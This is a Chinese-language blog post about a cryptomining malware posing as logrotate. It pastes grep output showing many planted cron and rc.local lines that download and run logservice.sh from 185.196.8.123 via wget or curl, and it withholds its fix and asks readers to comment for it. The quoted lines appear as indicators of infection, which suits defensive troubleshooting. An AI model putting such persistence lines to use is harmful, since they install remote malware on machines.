【已解决】挖矿病毒 logrotate 185.196.8.123
如果你最近也中了这个病毒,看这篇文章就对了。
网上找了几篇类似文章,都是教你杀进程、删文件,但新版的病毒已经进化了,进程杀死复活,文件删掉又有了...
经过本人几天的尝试,最终找到了干掉他的方法。
先确定下你的症状是不是跟我一样?
问题现象:Shell登录慢,logrorateCPU占用高,这个进程的文件路径为:/root/.config/logrotate,删掉又重新生成。
使用find /etc | xargs grep -ri "185.196.8.123" 命令查了下,大概有以下文件被加入了恶意脚本:
各种级别的定时任务、系统登录、退出时执行
/etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1 /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.daily/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) grep: /etc/systemd/system/dev-virtiox2dports-org.qemu.guest_agent.0.device.wants: 没有那个文件或目录 grep: /etc/systemd/system/dev-virtiox2dports-org.qemu.guest_agent.0.device.wants/qemu-guest-agent.service: 没有那个文件或目录 /etc/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1 grep: /etc/alternatives/mta-mailqman: 没有那个文件或目录 grep: /etc/alternatives/mta-newaliasesman: 没有那个文件或目录 grep: /etc/alternatives/mta-sendmailman: 没有那个文件或目录 grep: /etc/alternatives/mta-aliasesman: 没有那个文件或目录 /etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1 /etc/rc.d/rc.local:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) >/dev/null 2>&1 /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.hourly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.weekly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/cron.monthly/logrotate:source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontab~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh) /etc/crontaz~:@daily source <(wget -q -O - http://185.196.8.123/logservice.sh || curl -sL http://185.196.8.123/logservice.sh)
解决思路:
正常解决思路无法清理掉,博主使用了一波骚操作来顺利清理掉。为了防止写此病毒脚本的人看到这篇文章来升级脚本,思路就不放出来了。需要的同学请留言,我来无偿发你
中病毒原因:我猜你大概率是开过8000端口😄